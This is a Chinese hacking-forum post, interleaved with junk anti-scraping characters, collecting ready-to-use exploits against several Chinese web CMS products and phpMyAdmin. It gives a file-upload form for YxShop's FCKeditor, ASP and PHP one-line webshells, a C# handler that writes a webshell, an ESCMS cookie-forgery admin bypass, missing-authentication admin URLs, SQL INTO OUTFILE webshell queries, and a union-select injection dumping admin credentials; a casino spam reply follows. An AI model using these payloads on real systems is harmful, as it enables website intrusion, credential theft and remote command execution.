---------------------------------------------------------------------------------------------------------------------------------------------------------------------------( m! \4 ~. b2 I* Z, u
# d! ^% k5 A9 M
YxShop易想购物商城4.7.1版本任意文件上传漏洞
- d1 J7 @. ?& R: n: H1 F# Z8 i5 C
4 X9 l% G- t' N% Vhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx! B, C0 s5 }' R8 L9 J! m5 J0 q
跳转到网站根目录上传任意文件。
* }* b4 v  K2 B& U/ W, `7 ]/ R: y如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
' |$ y3 {2 b1 W<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
8 @' a( p" q: O% |$ ?Upload a new file:<br>
# p( q  @* x% R% G4 S: e8 H- T<input type="file" name="NewFile" size="50"><br>8 F! C- N* n" u
<input id="btnUpload" type="submit" value="Upload">
- i* L& e+ G& v2 m% N% H& B</form>1 z7 k$ c" T* \. O- b2 c
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 r  W/ ~$ U: Q; M
! t. w4 h! @1 K  e+ c
SDcms 后台拿webshell: V) A7 q- t; ^% X
/ T; D/ p* k& a/ l, k# h/ P
第一种方法:
1 s( ^$ M! T# S$ T6 l  e! D进入后台-->系统管理-->系统设置-->系统设置->网站名称;
* d" y1 l) {. c) e% c! J  v) j3 v把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx$ a1 ^7 ~1 \/ _* y9 l! R1 V( n
用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。- }' Q1 E, c  ]: d
第二种方法:. B3 s+ i9 s9 d! P
进入后台-->系统管理-->系统设置-->系统设置->上传设置;4 W, b  @' ]6 k. U  R3 i, |% J
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!% C& Z3 ^* D7 p" d7 p3 m" q
第三种方法:
8 [+ U' F" ^9 G  e2 x* U! O" F进入后台-->界面管理-->模板文件管理-->创建文件( X; o5 q" Q# S5 F
文件名写入getshell.ashx3 v: a- @2 ?# E  c, u
内容写入下面内容:
6 m5 \, s; [$ ?7 s/====================复制下面的=========================/
1 {8 q8 @, G. ~# Q<%@ WebHandler Language="C#" Class="Handler" %>
6 L( L9 i( e. m5 ?1 J& |using System;( L3 y- \' v& ]5 K! E1 u% h
using System.Web;8 {/ V- \. m( p" A( }+ X" V8 V# v! g
using System.IO;
. o, }. W4 q7 z& ]public class Handler : IHttpHandler {
  u: ^! W1 B: F) g) upublic void ProcessRequest (HttpContext context) {2 q( z" N$ ]1 d2 f' T* \: t# b
context.Response.ContentType = "text/plain";6 S1 t' Q; D& M# P1 L
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));9 N% n  \4 i, y) d1 n
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");" M" K7 F  u7 t6 G) m3 k9 n
file1.Flush();' p9 k: k! `! w
file1.Close();
4 n; h: C4 l% ~1 x9 d& c}
; s) C# N+ Q: }. W" g! O: Tpublic bool IsReusable {6 d8 s% n8 I2 K! X/ H# y: q  Q9 N
get {
* u5 M0 q* B) G' h- T: Areturn false;( r& V# g. z# y3 J
}3 n' z0 K" j' d% y, i+ D
}' P6 L6 n( `1 ^& M) D
}
, x9 y7 p% T; J" ~$ Y' f/=============================================/
! f! J6 R6 R) C$ ]) g6 s! @$ b3 ^1 M- j访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
/ V0 M* Q! u: @+ G, o5 _3 `会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
" K3 [1 f4 ^, o; {) v& k-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: @' q8 {5 X& o, Q( X8 x' c" y; Y) D! |3 i
ESCMS网站管理系统0day  N: p8 Q3 J/ ^
4 `/ k) }: M: R( i6 g
后台登陆验证是通过admin/check.asp实现的
* l/ Q3 W% L* R# I! G! ?* m* `0 o. z! f* @. W' ~
首先我们打开http://target.com/admin/es_index.html" n8 L. n2 M( g$ r, E
然后在COOKIE结尾加上
4 z# {$ A5 o' C' ~; ESCMS$_SP2=ES_admin=st0p;/ l2 s: d3 h1 Z( p
修改,然后刷新
; L8 e* r5 l# x( n8 M4 g进后台了嘎..- z: S' z, g4 b9 k8 Z' Y
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL5 s% s+ A& j9 f" {2 O/ p3 M

, E3 q$ B1 g3 `9 D* V2 ~" s+ x- ?利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.& D1 M: Q( T2 ~5 g
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
4 S+ E. C" f$ \% q! m# Z0 R5 h存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
7 v# n4 \7 w  Y1 d在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了, I, x/ K  g; q0 D/ p5 T% D1 n7 {
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 C# U& Q# Y" m2 X7 c9 b9 i& O
% l! e5 C% O0 h' b+ L宁志网站管理系统后台无验证漏洞及修复
: k! |* N, |" v/ w  O
0 [5 M) F7 N9 E4 ?" s网上搜了一下,好像没有发布.如有雷同纯粹巧合!2 z& j- E+ |9 X3 |5 r3 g- d
官方网站:www.ningzhi.net
$ N5 T) ?- {4 O; U学校网站管理系统 V.2011版本 & w2 l- |0 r  G
http://down.chinaz.com/soft/29943.htm ( I1 {& v3 ]" H# D- `
其它版本(如:政府版等),自行下载.
0 Q" x1 b% P9 l, S! X0 M8 V漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
5 j  P1 m' q# T' Q: |" qlogin.asp代码如下:
) L' {5 `% x9 T/ ^0 N( J) R4 c+ Y1 c<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
, u  C. M7 @; U& Cmanage.asp代码我就不帖出来了.反正也没验证.% _; \( [$ Q! V- G: r' n/ K, x: @
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!% i; }! Z) z. R2 ^. w
漏洞利用:0 Y5 \$ h- X3 m0 I; Y2 K
直接访问http://www.0855.tv/admin/manage.asp" g* [+ D1 ]9 S6 M" m- _$ v
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
; F- S# b' B  ~/ ^7 H; C----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ O) p/ l/ G0 A1 l1 D+ T3 V; }7 A

: z$ g0 r+ Q8 o5 h4 s, `- w2 a- hphpmyadmin拿shell的四种方法总结及修复
4 _+ `1 \- e+ @- f8 ^( J" {& h: ^+ Y4 I8 h
方法一:
, ?& n; V$ C/ Z# k" ^* ?CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );; j0 y! N  x% M- h, c  d
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
3 f! ~# |) m- w4 wSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
4 m# ?+ }  B8 X1 t+ R. F' ~# {. m# |, B# A----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php) C% L. D$ ~: p9 i
    一句话连接密码:7on8 s; g& X5 H/ ~  K
方法二:
" S0 N+ Y* N; E3 f/ H' `% z9 m读取文件内容:    select load_file('E:/xamp/www/s.php');3 E. V: N, A: K- U7 N6 ?8 P
写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
* k" F, c. a# ?5 [# h0 Wcmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
; F& q' ^% v  K方法三:
7 p8 I% p& J9 ?' U" r# OJhackJ版本 PHPmyadmin拿shell
* r- E& {5 K" @9 G* q/ z) UCreate TABLE study (cmd text NOT NULL);8 t% ]9 l  \4 {, g" l
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');$ j& k$ A- w& K' R: L
select cmd from study into outfile 'E:/wamp/www/7.php';
% q- e% B% J. T) H- I  A" x" CDrop TABLE IF EXISTS study;' A0 Z9 G( D8 i6 L1 y
<?php eval($_POST[cmd])?>; n1 _/ t$ R' ^4 c4 \3 |2 c0 N" E
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。3 {- A  j: l+ i. i" R
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1" y. ^7 j9 T- s2 Y1 }0 Q+ U
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
  _, t' d  p9 p' q/ w" m) aDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。) ~5 R0 |  n' M+ B1 D9 y
方法四:) d& b0 g- o$ p
select load_file('E:/xamp/www/study.php');
' I! t. w7 k3 R8 x8 R5 x+ rselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
. i% }$ g! ~& s! X+ \% i4 o然后访问网站目录:http://www.2cto.com/study.php?cmd=dir! g  Y# F- n- G
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
% h5 [1 w* u% H1 V0 r$ [7 o
4 D: f* e. V, ^# E" |NO.001中学网站管理系统 Build 110628 注入漏洞
% E" E1 E, F1 ]! p! b
5 m4 s/ s+ o* S+ r. T7 C3 m* ]NO.001中学网站管理系统功能模块:
8 C" E( A7 L% c  P6 ^& E! b1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等, ^: d# @* _) }5 z3 F# t
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息4 w0 s# S6 y7 j+ f1 |9 b
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
( C- @1 E/ j0 m5 s, J4 X8 }4.视频图片管理:一级分类,动态添加视频或者图片等信息
( G& i6 R7 f+ T6 z+ X5.留言管理:对留言,修改,删除、回复等管理
2 f7 \, ^% A1 y- H6 _6.校友频道:包括校友资料excel导出、管理等功能
# X( Y) [. v# M$ p$ @7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
6 v# s4 b" W! b默认后台:admin/login.asp
5 A  F* W# Z# r* Y2 e官方演示:http://demo.001cms.net
, X3 B# [8 P7 k& `0 e5 r  r源码下载地址:http://down.chinaz.com/soft/30187.htm. ^7 q4 i. ^) f; _7 u
EXP:9 g0 k8 w7 i. V$ p& O: K8 `+ [
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin% S, V  B$ w/ V
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin* P$ F+ M* u! v
getshell:后台有备份,你懂的7 O( P* A. t8 r) ~- h% }& i
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。0 F8 H! {1 m" J- X
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表